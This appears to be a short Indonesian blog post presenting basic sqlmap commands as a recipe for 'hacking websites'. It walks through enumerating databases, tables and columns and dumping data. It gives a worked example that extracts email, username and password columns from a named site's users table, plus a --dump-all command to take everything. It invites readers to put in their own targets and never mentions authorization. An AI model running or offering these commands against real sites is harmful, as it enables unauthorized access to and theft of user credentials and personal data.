Oke cekidot saja inilah beberapa perintah-perintah dasar sqlmap untuk hacking website :
- sqlmap.py -u url_target --dbs
Perintah ini digunakan untuk mengambil semua nama database di server. Isi link target dengan web tujuan kalian wkwk.
- sqlmap.py -u url_target -D nama_database --tables
Perintah ini digunakan untuk mengambil semua table dari suatu database.
nama_database isi dengan nama database yang ingin ditampilkan semua
tablenya.
- sqlmap.py -u url_target -D nama_database -T nama_table --columns
Perintah ini digunakan untuk menampilkan semua column dari sebuah table
yang ada di sebuah database server. Ganti nama tablenya sesuai dengan
nama table yang ada di database target masing-masing.
- sqlmap.py -u url_target -D nama_database -T nama_table -C nama_columns --dump
Perintah ini digunakan untuk menampilkan isi dari semua data dari sebuah
table. isi nama nama_columns dengan kolom-kolom yang ada di table
tersebut. Contoh penulisanya seperti ini :
sqlmap.py -u iangoblog.com/user.php?id=2 -D iangoblog -T users -C email,username,password --dump
Tapi kalau kalian ingin langsung saja mengambil semua data yang ada di
database servernya, kalian bisa langsung menuliskan perintah di bawah
ini dan kalian tinggal hanya menunggu saja. Kecepatan tergantung dengan
kecepatan internet yang kalian punya. Perintahnya sebagai berikut :
sqlmap.py -u iangoblog.com/user.php?id=2 --dump-all - tekan enter
No comments:
Post a Comment